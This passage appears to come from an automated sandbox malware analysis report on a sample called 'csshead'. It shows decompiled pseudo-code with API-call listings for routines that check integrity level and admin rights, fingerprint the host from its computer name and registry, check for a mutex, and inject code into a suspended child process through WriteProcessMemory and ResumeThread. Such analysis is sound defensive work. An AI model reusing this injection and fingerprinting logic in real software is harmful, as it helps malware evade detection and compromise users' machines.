    				 *((intOrPtr*)(_t55 - 4)) = 0;
    				_t26 = L0042CE7D();
    				_t61 = _t26;
    				if(_t26 < 0) {
    					L00424664(_t51, _t61, _t67);
    					_t46 = 0x1b;
    				}
    				 *0x444a90 = GetCommandLineA(); // executed
    				_t28 = E0042CDE6(); // executed
    				 *0x442c34 = _t28;
    				_t29 = L0042CD2B(_t46);
    				_t62 = _t29;
    				if(_t29 < 0) {
    					L00424664(_t51, _t62, _t67);
    					_t46 = 8;
    				}
    				_t30 = E0042CAB5(_t46, _t51, _t52);
    				_t63 = _t30;
    				if(_t30 < 0) {
    					_push(9);
    					L00424664(_t51, _t63, _t67);
    				}
    				_t31 = E00424443(_t52, 0, 1); // executed
    				_pop(_t47);
    				_t64 = _t31;
    				if(_t31 != 0) {
    					L00424664(_t51, _t64, _t67);
    					_t47 = _t31;
    				}
    				_t32 = L0042CA56(_t47);
    				_t65 =  *(_t55 - 0x3c) & 0x00000001;
    				if(( *(_t55 - 0x3c) & 0x00000001) == 0) {
    					_t48 = 0xa;
    				} else {
    					_t48 =  *(_t55 - 0x38) & 0x0000ffff;
    				}
    				_push(_t48);
    				_push(_t32);
    				_push(0);
    				_push(0x400000);
    				 *((intOrPtr*)(_t55 - 0x20)) = L00419D20(_t45, _t52, _t65, _t67);
    				if( *(_t55 - 0x1c) == 0) {
    					L0042461A(_t33);
    				}
    				L00424646();
    				 *((intOrPtr*)(_t55 - 4)) = 0xfffffffe;
    				return L00429F35( *((intOrPtr*)(_t55 - 0x20)));
    			}

    APIs
    • GetStartupInfoW.KERNEL32(?,0043CD78,00000058), ref: 00424C11
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00424C26
      • Part of subcall function 0042769E: HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7
      • Part of subcall function 004260A2: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00424C8B), ref: 004260AA
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004260CC
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004260D9
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004260E6
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004260F3
      • Part of subcall function 004260A2: TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
      • Part of subcall function 004260A2: TlsSetValue.KERNEL32(00000000,?,00424C8B), ref: 0042615E
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426179
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426186
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426193
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 004261A0
      • Part of subcall function 004260A2: RtlDecodePointer.NTDLL(Function_00025F05,?,00424C8B), ref: 004261C1
      • Part of subcall function 004260A2: RtlDecodePointer.NTDLL(00000000,?,00424C8B), ref: 004261F0
      • Part of subcall function 004260A2: GetCurrentThreadId.KERNEL32 ref: 00426202
    • __RTC_Initialize.LIBCMT ref: 00424C97
      • Part of subcall function 0042CE7D: GetStartupInfoW.KERNEL32(?), ref: 0042CE8A
      • Part of subcall function 0042CE7D: GetFileType.KERNEL32(?), ref: 0042CFBD
      • Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042CFF3
      • Part of subcall function 0042CE7D: GetStdHandle.KERNEL32(-000000F6), ref: 0042D047
      • Part of subcall function 0042CE7D: GetFileType.KERNEL32(00000000), ref: 0042D059
      • Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(-00443954,00000FA0), ref: 0042D087
      • Part of subcall function 0042CE7D: SetHandleCount.KERNEL32 ref: 0042D0B0
    • __amsg_exit.LIBCMT ref: 00424CAA
    • GetCommandLineA.KERNEL32 ref: 00424CB0
      • Part of subcall function 0042CDE6: GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
      • Part of subcall function 0042CDE6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0042CE2E
      • Part of subcall function 0042CDE6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0042CE51
      • Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64
      • Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70
      • Part of subcall function 0042CD2B: GetModuleFileNameA.KERNEL32(00000000,004434C0,00000104), ref: 0042CD57
      • Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CD82
      • Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CDC3
    • __amsg_exit.LIBCMT ref: 00424CD0
      • Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CADF
      • Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CB10
    • __amsg_exit.LIBCMT ref: 00424CE1
      • Part of subcall function 00424443: __initterm_e.LIBCMT ref: 00424479
    • __amsg_exit.LIBCMT ref: 00424CF4
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd

    Control-flow Graph
    • Basic blocks 4042d4-404405 (rendered executed / not-executed graph not reproduced in text)
    C-Code - Quality: 88%
    			E004042D4(void* __eax) {
    				void* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				void* _v20;
    				long _v24;
    				void** _v28;
    				intOrPtr _v32;
    				char* _v36;
    				intOrPtr* _v40;
    				signed int _t40;
    				signed int _t47;
    				signed int _t59;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_t40 = OpenProcessToken(_v8, 8,  &_v20);
    				asm("sbb eax, eax");
    				if( ~( ~_t40) == 0) {
    					L17:
    					_v12 = _v16;
    					return _v12;
    				}
    				_t47 = GetTokenInformation(_v20, 0x19, 0, 0,  &_v24); // executed
    				asm("sbb eax, eax");
    				if( ~( ~_t47) != 0 || GetLastError() != 0x7a) {
    					L16:
    					CloseHandle(_v20);
    					goto L17;
    				} else {
    					_v28 = E004013DC(_v24);
    					if(_v28 == 0) {
    						goto L16;
    					}
    					_t59 = GetTokenInformation(_v20, 0x19, _v28, _v24,  &_v24); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t59) != 0) {
    						_v36 = GetSidSubAuthorityCount( *_v28);
    						if(_v36 != 0 &&  *_v36 > 0) {
    							_v40 = GetSidSubAuthority( *_v28, ( *_v36 & 0x000000ff) - 1);
    							if(_v40 != 0) {
    								_v32 =  *_v40;
    								if(_v32 >= 0x2000) {
    									if(_v32 < 0x2000 || _v32 >= 0x3000) {
    										if(_v32 >= 0x3000) {
    											_v16 = 3;
    										}
    									} else {
    										_v16 = 2;
    									}
    								} else {
    									_v16 = 1;
    								}
    							}
    						}
    					}
    					E00401440(_v28);
    					goto L16;
    				}
    			}

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
    • GetLastError.KERNEL32 ref: 00404322
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
    • GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
    • GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • CloseHandle.KERNEL32(?), ref: 004043F3
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph
    • Basic blocks 424890-424945 (rendered executed / not-executed graph not reproduced in text)
    APIs
    • RtlDecodePointer.NTDLL(00442BF0,@G@,00000000,?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000,?,00423975,00432EB5,00000000), ref: 004248A5
    • RtlDecodePointer.NTDLL(?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000,?,00423975,00432EB5,00000000), ref: 004248B2
      • Part of subcall function 004252AE: RtlSizeHeap.NTDLL(00000000,00000000), ref: 004252D9
      • Part of subcall function 0042A170: Sleep.KERNEL32(00000000,00000000,00000000,?,0042490A,00000000,00000010,?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000), ref: 0042A19A
    • RtlEncodePointer.NTDLL(00000000), ref: 00424917
    • RtlEncodePointer.NTDLL(00000000,?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000,?,00423975,00432EB5,00000000), ref: 0042492B
    • RtlEncodePointer.NTDLL(-00000004,?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000,?,00423975,00432EB5,00000000), ref: 00424933
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 21%
    			E00424890(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t11;
    				intOrPtr* _t12;
    				intOrPtr _t13;
    				intOrPtr _t17;
    				intOrPtr _t18;
    				void* _t19;
    				void* _t22;
    				void* _t24;
    				intOrPtr _t25;
    				void* _t27;
    				void* _t28;
    				void* _t34;
    				signed int _t37;
    				intOrPtr* _t38;
    				void* _t40;
    				intOrPtr* _t41;
    				intOrPtr* _t42;
    
    				_t41 =  *0x4331bc;
    				_t11 =  *_t41( *0x444aa0, _t34, _t40, _t24, _t28); // executed
    				_t25 = _t11;
    				_v8 = _t25;
    				_t12 =  *_t41( *0x444a9c); // executed
    				_t42 = _t12;
    				if(_t42 < _t25) {
    					L11:
    					_t13 = 0;
    				} else {
    					_t37 = _t42 - _t25;
    					_t2 = _t37 + 4; // 0x4
    					if(_t2 < 4) {
    						goto L11;
    					} else {
    						_t27 = E004252AE(_t25);
    						_t3 = _t37 + 4; // 0x4
    						if(_t27 >= _t3) {
    							L10:
    							_t38 =  *0x4331b8; // executed
    							_t17 =  *_t38(_a4); // executed
    							 *_t42 = _t17;
    							_t18 =  *_t38(_t42 + 4); // executed
    							 *0x444a9c = _t18;
    							_t13 = _a4;
    						} else {
    							_t19 = 0x800;
    							if(_t27 < 0x800) {
    								_t19 = _t27;
    							}
    							_t20 = _t19 + _t27;
    							if(_t19 + _t27 < _t27) {
    								L7:
    								_t5 = _t27 + 0x10; // 0x10
    								_t21 = _t5;
    								if(_t5 < _t27) {
    									goto L11;
    								} else {
    									_t22 = L0042A170(_v8, _t21);
    									if(_t22 == 0) {
    										goto L11;
    									} else {
    										goto L9;
    									}
    								}
    							} else {
    								_t22 = L0042A170(_v8, _t20);
    								if(_t22 != 0) {
    									L9:
    									_t42 = _t22 + (_t37 >> 2) * 4;
    									 *0x444aa0 =  *0x4331b8(_t22);
    									goto L10;
    								} else {
    									goto L7;
    								}
    							}
    						}
    					}
    				}
    				return _t13;
    			}

    APIs
    • RtlDecodePointer.NTDLL(00442BF0,@G@,?,?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5,?), ref: 004248A5
    • RtlDecodePointer.NTDLL(?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5,?), ref: 004248B2
      • Part of subcall function 004252AE: HeapSize.KERNEL32(00000000,00000000,?,004248D0,00000000,?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5), ref: 004252D9
      • Part of subcall function 0042A170: Sleep.KERNEL32(00000000,00000000,00000000,?,0042490A,00000000,00000010,?,?,00424994,?,0043CD58,0000000C,004249C0,?), ref: 0042A19A
    • EncodePointer.KERNEL32(00000000,?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5,?), ref: 00424917
    • RtlEncodePointer.NTDLL(?,?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5,?), ref: 0042492B
    • RtlEncodePointer.NTDLL(-00000004,?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5,?), ref: 00424933
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 75%
    			E00409347() {
    				void* _t16;
    				intOrPtr _t24;
    				intOrPtr _t29;
    				intOrPtr _t32;
    				intOrPtr _t42;
    				intOrPtr* _t47;
    				intOrPtr* _t49;
    				void* _t51;
    
    				_t16 =  *_t49(); // executed
    				if(_t16 != 0) {
    					 *_t47(0);
    				}
    				if(E0040453C(GetCurrentProcess()) == 0) {
    					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
    					E0040133C(_t51 - 0x218, 0x40946c);
    				} else {
    					GetWindowsDirectoryA(_t51 - 0x218, 0x101);
    					_t42 =  *0x40a0b0; // 0x401c64
    					E0040133C(_t51 - 0x218, _t42);
    				}
    				_t24 =  *0x40a08c; // 0x401c00
    				E0040133C(_t51 - 0x218, _t24);
    				_t29 = E00405028(_t51 - 0x218, 0, E00409080, _t51 - 0x117, 0xffffffff, 0xfa0); // executed
    				 *((intOrPtr*)(_t51 - 0xc)) = _t29;
    				if( *((intOrPtr*)(_t51 - 0xc)) == 0xffffffff) {
    					 *0x40b21c(0, _t51 - 0x218, 0x26, 0xffffffff);
    					_t32 =  *0x40a0dc; // 0x401ce8
    					E0040133C(_t51 - 0x218, _t32);
    					if(PathFileExistsA(_t51 - 0x218) != 0) {
    						 *((intOrPtr*)(_t51 - 0xc)) = E00405028(_t51 - 0x218, 0, E00409080, _t51 - 0x117, 0xffffffff, 0xfa0);
    					}
    				}
    				ExitProcess(0);
    			}

    APIs
    • GetCurrentProcess.KERNEL32 ref: 00409359
      • Part of subcall function 0040453C: GetCurrentProcess.KERNEL32 ref: 00404555
      • Part of subcall function 0040453C: IsWow64Process.KERNEL32(00000000,?), ref: 0040456F
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 00409374
    • GetWindowsDirectoryA.KERNEL32(?,00000101), ref: 0040939D
      • Part of subcall function 00405028: GetModuleHandleA.KERNEL32(00000000), ref: 00405040
      • Part of subcall function 00405028: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
      • Part of subcall function 00405028: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
      • Part of subcall function 00405028: MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D
      • Part of subcall function 00405028: GetThreadContext.KERNEL32(?,00010007), ref: 00405209
      • Part of subcall function 00405028: VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
      • Part of subcall function 00405028: WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C
      • Part of subcall function 00405028: ResumeThread.KERNELBASE(?), ref: 0040527E
      • Part of subcall function 00405028: WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
      • Part of subcall function 00405028: GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
      • Part of subcall function 00405028: CloseHandle.KERNEL32(?), ref: 004052BE
      • Part of subcall function 00405028: CloseHandle.KERNEL32(?), ref: 004052C8
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00409406
    • PathFileExistsA.SHLWAPI(?), ref: 00409428
    • ExitProcess.KERNEL32 ref: 0040945B
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph
    • Basic blocks 407c4e-407cf9 (rendered executed / not-executed graph not reproduced in text)
    C-Code - Quality: 100%
    			E00407C4E(CHAR* __eax) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				void _v84;
    				intOrPtr _v100;
    				void _v104;
    				void* _t24;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_t24 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_v16 = _t24;
    				if(_v16 == 0xffffffff) {
    					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
    				}
    				if(_v16 != 0xffffffff) {
    					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0); // executed
    					SetFilePointer(_v16, _v24 + 4, 0, 0); // executed
    					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0); // executed
    					CloseHandle(_v16);
    					_v12 = _v100;
    				}
    				return _v12;
    			}

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
    • ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
    • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
    • ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
    • CloseHandle.KERNEL32(000000FF), ref: 00407CE7
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00407C50(CHAR* __eax) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				void _v84;
    				intOrPtr _v100;
    				void _v104;
    				void* _t24;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_t24 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_v16 = _t24;
    				if(_v16 == 0xffffffff) {
    					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
    				}
    				if(_v16 != 0xffffffff) {
    					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0); // executed
    					SetFilePointer(_v16, _v24 + 4, 0, 0); // executed
    					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0); // executed
    					CloseHandle(_v16);
    					_v12 = _v100;
    				}
    				return _v12;
    			}

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
    • ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
    • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
    • ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
    • CloseHandle.KERNEL32(000000FF), ref: 00407CE7
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 93%
    			E00404A68(intOrPtr __eax) {
    				intOrPtr _v8;
    				signed int _v12;
    				long _v16;
    				signed int _v20;
    				void* _v24;
    				char _v153;
    				int _t30;
    				char* _t32;
    				intOrPtr _t37;
    				void* _t48;
    				intOrPtr _t49;
    				void* _t51;
    				signed int _t52;
    				signed char _t62;
    				intOrPtr _t67;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_v16 = 0x81;
    				_t30 = GetComputerNameA( &_v153,  &_v16);
    				_t72 = _t30;
    				if(_t30 != 0) {
    					_v12 = E00401740( &_v153);
    				}
    				_t32 =  *0x40a25c; // 0x402174
    				RegOpenKeyExA(0x80000002, _t32, 0, 0x20119,  &_v24); // executed
    				_v16 = 4;
    				_v20 = 0;
    				_t37 =  *0x40a0f0; // 0x401d3c
    				E004038B0(_v24, _t37, 0, 0,  &_v20,  &_v16); // executed
    				E00403890(_v24);
    				_v12 = _v12 ^ _v20 ^ 0x4c8aa297;
    				E00401164(_v12,  &_v153);
    				 *0x40a064 = E004044F0(_t72);
    				_t48 = GetCurrentProcess(); // executed
    				_t49 = E004042D4(_t48); // executed
    				 *0x40a068 = _t49;
    				if(E004044F0(_t72) >= 0x3c) {
    					_t51 = GetCurrentProcess(); // executed
    					_t52 = E004042D4(_t51); // executed
    					__eflags = _t52 - 3;
    					_t21 = _t52 == 3;
    					__eflags = _t21;
    					asm("sbb eax, eax");
    					 *0x40a034 =  ~(_t52 & 0xffffff00 | _t21);
    				} else {
    					_t62 = E004041CC();
    					asm("sbb eax, eax");
    					 *0x40a034 =  ~_t62;
    				}
    				if( *0x40a034 != 0) {
    					_t67 =  *0x40a09c; // 0x401c30
    					E00401308(_v8, _t67);
    				}
    				E0040133C(_v8, 0x404b9c);
    				return E0040133C(_v8,  &_v153);
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,00000081), ref: 00404A8B
    • RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00404AB9
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
      • Part of subcall function 004044F0: GetVersionExA.KERNEL32(0000009C), ref: 0040451A
    • GetCurrentProcess.KERNEL32 ref: 00404B17
      • Part of subcall function 004042D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
      • Part of subcall function 004042D4: GetLastError.KERNEL32 ref: 00404322
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
      • Part of subcall function 004042D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
      • Part of subcall function 004042D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
      • Part of subcall function 004042D4: CloseHandle.KERNEL32(?), ref: 004043F3
    • GetCurrentProcess.KERNEL32 ref: 00404B41
      • Part of subcall function 004041CC: GetCurrentThread.KERNEL32 ref: 004041DE
      • Part of subcall function 004041CC: OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
      • Part of subcall function 004041CC: GetLastError.KERNEL32 ref: 004041F4
      • Part of subcall function 004041CC: GetCurrentProcess.KERNEL32 ref: 00404207
      • Part of subcall function 004041CC: OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004041CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
      • Part of subcall function 004041CC: CloseHandle.KERNEL32(?), ref: 0040424E
      • Part of subcall function 004041CC: AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
      • Part of subcall function 004041CC: EqualSid.ADVAPI32(?,?), ref: 004042A2
      • Part of subcall function 004041CC: FreeSid.ADVAPI32(?), ref: 004042BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 79%
    			E00409230(intOrPtr* __ebx, intOrPtr* __ecx) {
    				void* _t8;
    				void* _t11;
    				int _t12;
    				void* _t13;
    				CHAR* _t14;
    				void* _t22;
    				intOrPtr _t24;
    				void* _t25;
    
    				_t8 =  *__ecx(); // executed
    				if(_t8 != 0) {
    					_push(0);
    					 *__ebx();
    				}
    				_pop(_t22);
    				_pop(_t19);
    				_t24 =  *0x40a0a8; // 0x401c4c
    				_t11 = E00401110( *((intOrPtr*)(_t25 - 4)), _t24);
    				_t29 = _t11;
    				if(_t11 == 0) {
    					 *((char*)(_t25 - 0x116)) = 0x2d;
    				} else {
    					 *((char*)(_t25 - 0x116)) = 0x2b;
    					Sleep(0x3a98);
    				}
    				_t12 = E00406E04(_t22, _t29);
    				if(_t12 == 0) {
    					if( *((char*)(_t25 - 0x116)) != 0x2d) {
    						L9:
    						_push(_t12);
    						_push(_t22); // executed
    						_t13 = E004069BC(_t24, _t32); // executed
    						_t12 = _t13 + E004092CD;
    						goto __eax; // executed
    					}
    					_t14 =  *0x40a0d8; // 0x401cc8
    					_t12 = OpenMutexA(0x100000, 0, _t14);
    					 *(_t25 - 8) = _t12;
    					_t32 =  *(_t25 - 8);
    					if( *(_t25 - 8) == 0) {
    						goto L9;
    					}
    					_t12 = CloseHandle( *(_t25 - 8));
    					ExitProcess(0);
    				}
    				return _t12;
    			}

    APIs
    • Sleep.KERNEL32(00003A98), ref: 00409260
      • Part of subcall function 00406E04: GetModuleFileNameA.KERNEL32(00000000,?,000001F5), ref: 00406E26
      • Part of subcall function 00406E04: CharUpperBuffA.USER32(?,000001F5), ref: 00406E37
    • OpenMutexA.KERNEL32(00100000,00000000,00401CC8), ref: 00409292
    • CloseHandle.KERNEL32(00000000), ref: 004092A5
    • ExitProcess.KERNEL32 ref: 004092AD
      • Part of subcall function 004069BC: GetTempPathA.KERNEL32(00000101,?), ref: 004069E1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E0042CDE6() {
    				int _v8;
    				int _v12;
    				int _v16;
    				WCHAR* _t9;
    				int _t12;
    				int _t13;
    				char* _t15;
    				char* _t16;
    				WCHAR* _t21;
    
    				_t9 = GetEnvironmentStringsW();
    				_t21 = _t9;
    				if(_t21 != 0) {
    					if( *_t21 == 0) {
    						L5:
    						_t12 = (_t9 - _t21 >> 1) + 1;
    						_v16 = _t12;
    						_t13 = WideCharToMultiByte(0, 0, _t21, _t12, 0, 0, 0, 0);
    						_v12 = _t13;
    						if(_t13 == 0) {
    							L10:
    							FreeEnvironmentStringsW(_t21);
    							_t15 = 0;
    							L11:
    							return _t15;
    						}
    						_t16 = E0042A0DF(_t13); // executed
    						_v8 = _t16;
    						if(_t16 == 0) {
    							goto L10;
    						}
    						if(WideCharToMultiByte(0, 0, _t21, _v16, _t16, _v12, 0, 0) == 0) {
    							E00422804(_v8);
    							_v8 = 0;
    						}
    						FreeEnvironmentStringsW(_t21);
    						_t15 = _v8;
    						goto L11;
    					} else {
    						goto L3;
    					}
    					do {
    						do {
    							L3:
    							_t9 =  &(_t9[1]);
    						} while ( *_t9 != 0);
    						_t9 =  &(_t9[1]);
    					} while ( *_t9 != 0);
    					goto L5;
    				}
